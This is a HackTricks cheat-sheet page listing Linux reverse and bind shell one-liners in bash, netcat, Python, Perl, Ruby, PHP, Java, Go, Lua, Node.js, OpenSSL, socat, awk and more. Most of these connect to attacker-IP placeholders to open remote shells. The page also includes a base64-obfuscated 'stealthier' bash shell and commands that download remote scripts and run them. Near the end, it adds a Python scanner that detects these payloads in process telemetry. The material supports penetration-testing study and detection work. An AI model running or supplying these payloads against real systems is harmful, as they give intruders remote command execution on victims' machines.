# Shells - Linux
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of the PEASS or to download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
**If you have questions about any of these shells you can check them with** [**https://explainshell.com/**](https://explainshell.com)
## Full TTY
**Once you get a reverse shell,** [**read this page to obtain a full TTY**](full-ttys.md)**.**
## Bash | sh
```bash
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196; exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell, to get the output execute
exec >&0
```
Don't forget to try the other shells as well: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
### Symbol safe shell
```bash
#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```
### Create in file and execute
```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<ATTACKER-IP>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```
## Forward Shell
You might find cases where you have **RCE in a web app on a Linux machine** but, because of iptables rules or some other kind of filtering, **you cannot get a reverse shell**. This "shell" lets you keep a PTY shell through that RCE by using pipes inside the victim system.
You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)
You just need to modify:
* The URL of the vulnerable host
* The prefix and suffix of your payload (if any)
* The way the payload is sent (headers? data? extra info?)
Then you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that the pipes are read and written with a delay of roughly 1.3 s).
## Netcat
```bash
nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1> | /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## Telnet
```bash
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## Whois
**Attacker**
```bash
while true; do nc -l <PORT>; done
```
To send a command, type it, press Enter and then press CTRL+D (to close STDIN)
**Victim**
```bash
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <PORT> "Output: $X")`; sleep 1; done
```
## Python
```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```
## Perl
```bash
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## PHP
```php
// Using 'exec' is the most common method, but makes the assumption that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
## Java
```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
## Ncat
```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
```
## Golang
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```
## Lua
```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
## NodeJS
```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
```
or
```javascript
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
```
or
```javascript
var x = global.process.mainModule.require
x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
```
or
```javascript
// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
```
or
```javascript
// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');
```
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
## OpenSSL
Attacker (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
```
Victim
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```
## Socat
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
### Bind shell
```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
```
### Reverse shell
```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
## Awk
```bash
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
## Finger
**Attacker**
```bash
while true; do nc -l 79; done
```
To send a command, type it, press Enter and then press CTRL+D (to close STDIN)
**Victim**
```bash
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null)`; sleep 1; done
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```
## Gawk
```awk
#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
```
## Xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
```bash
xterm -display 10.0.0.1:1
```
To catch the incoming xterm, start an X server (:1, which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
```bash
Xnest :1
```
You'll need to authorise the target to connect to you (command also run on your host):
```bash
xhost +targetip
```
## Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76). NOTE: the Java reverse shell also works for Groovy.
```groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
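The payload families on this page share a few stable command-line markers: a `/dev/tcp` or `/dev/udp` redirect, `nc -e`, a `mkfifo`/`mknod` pipe into `nc`/`telnet`/`openssl`, `socket(...)` plus `dup2(...)` in Python, `socat ... EXEC:`, and a base64 blob piped into `base64 -d | bash`. The following Python scanner is an added, defender-side example (not code from this page or from HackTricks) that runs those markers over process-exec events, decoding base64 arguments first so the "stealthier" encoded variant above is still matched on its plaintext; the regexes, PIDs and the 203.0.113.0/24 addresses are constructed for the example.

```python
import base64
import re

# Constructed signature set for the payload families on this page (not a product ruleset):
# bash /dev/tcp, nc -e, mkfifo pipe into a client, python socket+dup2, socat EXEC:, base64-piped shell.
SIGNATURES = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/"),
    "nc_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s(-e|--exec)\s"),
    "fifo_pipe_shell": re.compile(r"(mkfifo|mknod)\s+\S+.*\|\s*(nc|ncat|telnet|openssl)\b"),
    "python_dup2_shell": re.compile(r"socket\(.*dup2\(.*(pty\.spawn|subprocess\.call|/bin/sh)"),
    "socat_exec": re.compile(r"\bsocat\b.*\bEXEC:"),
    "base64_piped_shell": re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def expand_base64(cmdline):
    """Return cmdline followed by the decoded text of any base64 blob it carries,
    so the 'stealthier' encoded variant is matched on its plaintext too."""
    extra = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            extra.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error subclasses ValueError: token was not base64
            continue
    return cmdline + " " + " ".join(extra) if extra else cmdline

def classify(cmdline):
    """Names of the signatures matching one process command line (dict order)."""
    text = expand_base64(cmdline)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(events):
    """Run classify() over (pid, cmdline) exec events and keep only the hits."""
    return [(pid, hits) for pid, cmd in events if (hits := classify(cmd))]

# Constructed sample exec events; 203.0.113.0/24 is a documentation range, not real telemetry.
ENCODED = base64.b64encode(b"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1").decode()
SAMPLE_EVENTS = [
    (101, "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"),
    (102, "nc -z 203.0.113.5 22"),  # benign port check: nc without -e
    (103, "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 4444 >/tmp/f"),
    (104, "python3 -c 'import socket;print(socket.gethostname())'"),  # benign socket use
    (105, "echo " + ENCODED + " | base64 -d | bash"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS):
        print(pid, hits)
```

Feeding it real auditd `EXECVE` or eBPF exec telemetry only requires building the `(pid, cmdline)` tuples from that source; the base64 pass is what keeps the encoded variant from slipping past a plain string match.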
## Bibliography
{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}
{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}